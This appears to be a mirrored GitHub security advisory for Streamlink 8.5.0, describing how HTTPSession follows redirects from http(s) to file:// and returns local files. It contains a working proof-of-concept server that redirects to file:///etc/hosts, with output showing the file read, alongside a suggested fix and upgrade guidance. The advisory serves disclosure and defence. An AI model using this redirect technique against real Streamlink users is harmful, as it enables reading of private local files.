GHSA-vf2x-4v53-pm7v: Medium severity pip/streamlink vulnerability

Published Sep 24, 2026
·
Updated

Summary

HTTPSession mounts a FileAdapter for the file:// scheme and inherits redirect handling unchanged from requests.Session. requests does not check for scheme downgrades or cross-protocol transitions when it follows a redirect, so any http(s) request Streamlink makes can be redirected by the remote server into file:///... and the local file is returned as the response body.

GHSA-hgqw-6m45-hw5f / CVE-2026-44353 fixed direct file:// segment and playlist URIs in HLS playlists and DASH manifests. Those checks look at the URL as it appears in the manifest, so a manifest that lists an ordinary https:// URL passes them, and the redirect happens later at fetch time. The attack surface is the same one that advisory describes, but the flaw is one level down in HTTPSession rather than in the streaming implementations, so it applies to every request the session makes and not only to segment and manifest fetches.

Affected version

Executed against released streamlink 8.5.0 (PyPI, installed into a clean venv on Python 3.12).

Attacker model

The attacker controls a URL the victim's Streamlink run reaches: a playlist or manifest URL passed on the command line, or any http(s) URL referenced from attacker-controlled manifest content. No privileges on the victim host and no file:// input are required, and the file:// scheme never appears in anything the victim or the manifest parser sees.

Proof of concept, executed

python import threading from http.server import BaseHTTPRequestHandler, HTTPServer

from streamlink.exceptions import StreamError from streamlink.session.http import HTTPSession

class H(BaseHTTPRequestHandler): def doGET(self): if self.path == "/segment": self.sendresponse(302) self.sendheader("Location", "file:///etc/hosts") self.endheaders() else: self.sendresponse(404) self.endheaders()

def logmessage(self, a): pass

srv = HTTPServer(("127.0.0.1", 0), H) port = srv.serverport threading.Thread(target=srv.serveforever, daemon=True).start()

s = HTTPSession() res = s.get(f"http://127.0.0.1:{port}/segment", exception=StreamError, timeout=5) print("requested http://127.0.0.1:%d/segment" % port) print("finalurl ", res.url) print("status ", res.statuscode) print("content ", res.content[:40]) srv.shutdown()

Output:

text requested http://127.0.0.1:52205/segment finalurl file:///etc/hosts status 200 content b'##\n# Host Database\n#\n# localhost is used'

The request goes out over http, the response comes back from the local filesystem, and nothing in between rejects the scheme change. Substituting a path the attacker wants read for /etc/hosts returns that file's contents into whatever consumes the response, which for a segment fetch means the file is written into the stream output.

Suggested fix

Override getredirecttarget() or resolveredirects() on HTTPSession and reject a redirect whose target scheme is not the same as the request's scheme or a permitted upgrade of it. Doing it on the session rather than through a response hook keeps plugin authors from removing the check by overriding hooks. Custom protocol adapters can still redirect, but only to https or to their own scheme.

AI tooling

AI assistance was used for the code audit and for drafting this report. The finding was manually verified against the project's source at the location cited above before reporting it, and the severity and impact assessment are my own.

Affected Software

1 affected componentFixes available
pip/streamlink<=8.5.0
8.6.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/streamlink to a version that resolves this vulnerability.

    Fixed in 8.6.0
  2. Compensating control

    Override get_redirect_target() or resolve_redirects() on HTTPSession to reject redirects whose target scheme differs from the request scheme, except for a permitted upgrade to https.

Event History

Sep 24, 2026
Advisory Published
via GitHub·02:58 PM
Data Sourced
via GitHub·02:58 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Who can trigger this issue in a Streamlink run?

An attacker must control a URL that the victim's Streamlink run reaches. The provided examples are a playlist or manifest URL supplied on the command line.

2

Does the exposure only apply to HLS segments and DASH manifests?

No. The vulnerable behavior is in HTTPSession redirect handling, so it applies to every request made by the session, not only manifest and segment fetches.

3

Can existing checks against file:// URLs in manifests prevent this attack?

No. A manifest can contain an ordinary HTTPS URL that passes those checks, then redirect to a file:// URL when Streamlink fetches it.

4

Which version is confirmed affected?

The issue was executed against the released PyPI package streamlink 8.5.0 in a clean Python 3.12 virtual environment.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203